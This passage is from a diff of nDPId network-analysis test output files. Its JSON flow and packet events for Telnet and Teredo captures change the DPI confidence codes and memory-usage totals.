{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160950,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 
+00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":92,"packets-processed":92,"total-skipped-flows":0,"total-l4-payload-len":1660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":943755197958} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 92/92 @@ -18,9 +18,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874159 bytes -~~ total memory freed........: 5874159 bytes -~~ total allocations/frees...: 118207/118207 +~~ total memory allocated....: 6007793 bytes +~~ total memory freed........: 6007793 bytes +~~ total allocations/frees...: 120969/120969 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 810 chars 
diff --git a/test/results/teredo.pcap.out b/test/results/teredo.pcap.out
index bc77c54c8..978db8de8 100644
--- a/test/results/teredo.pcap.out
+++ b/test/results/teredo.pcap.out
@@ -2,31 +2,31 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1438853615305} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1438853615305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853615305,"pkt":"bEFqjICJABsXAAEVCABFAABZWboAAH4R6SsKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853615305,"flow_last_seen":1438853615305,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853615305,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1438853615358,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853615358,"pkt":"ABsXAAEVbEFqjICJCABFAACJMb4AAHIRHPjCiBxMCnAQag3YzSEAdV9uAAEAALEbP+pGqa\/pAAAAMt5G+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1438853619792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853619792,"pkt":"bEFqjICJABsXAAEVCABFAABZKFgAAH4RGp8KcBBZwogcTOvdDdgARWZ6AAEAAJXRHBBSCtwOAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853619792,"flow_last_seen":1438853619792,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853619792,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1438853619844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853619844,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcAAAHIRHQfCiBxMCnAQWQ3Y690AdQSAAAEAAJXRHBBSCtwOAAAAFCJG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZJ0AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEz\/AAAAACABAA=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1438853629357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853629357,"pkt":"bEFqjICJABsXAAEVCABFAABZf5wAAH4Rw1cKcBBcwogcTPfYDdgAReM8AAEAAPs1qOhE924kAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853629357,"flow_last_seen":1438853629357,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853629357,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 
00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1438853629411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853629411,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcEAAHIRHQPCiBxMCnAQXA3Y99gAdXxOAAEAAPs1qOhE924kAAAACCdG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYAZL4AAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEwAAAAAAAAAAA=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1438853632713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853632713,"pkt":"bEFqjICJABsXAAEVCABFAABZcmgAAH4R0KcKcBBAwogcTNtaDdgARUt\/AAEAABh7537NjT4KAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853632713,"flow_last_seen":1438853632713,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1438853632713,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1438853632766,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1438853632766,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcIAAHIRHR7CiBxMCnAQQA3Y21oAdWZ0AAEAABh7537NjT4KAAAAJKVG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYARiEAAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEy6FgeABnFWlQ=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1438853633749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABQa1QAAH4R18EKcBBDwogcTMpkDdgAPJPWYAAAAAAMOhUgAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTYAA6wgo8LJvAAAAAA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1438853633749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABRa1UAAH4R178KcBBDwogcTMpkDdgAPZLqYAAAAAANOv8gAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTIAAbVcAAQaF2tytrco="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1438853633803,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1438853633803,"pkt":"ABsXAAEVbEFqjICJCABFAABRMcMAAHIRHVLCiBxMCnAQQw3YymQAPZNqYAAAAAANOn8gAsKIHEwAAAAAAADCiBxMIAEAAMKIHEwg8zWbRvk\/RoEAbFcAAQaF2tytrco="} 
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1438853653349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1438853653349,"pkt":"bEFqjICJABsXAAEVCABFAABZW7oAAH4R5ysKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}} 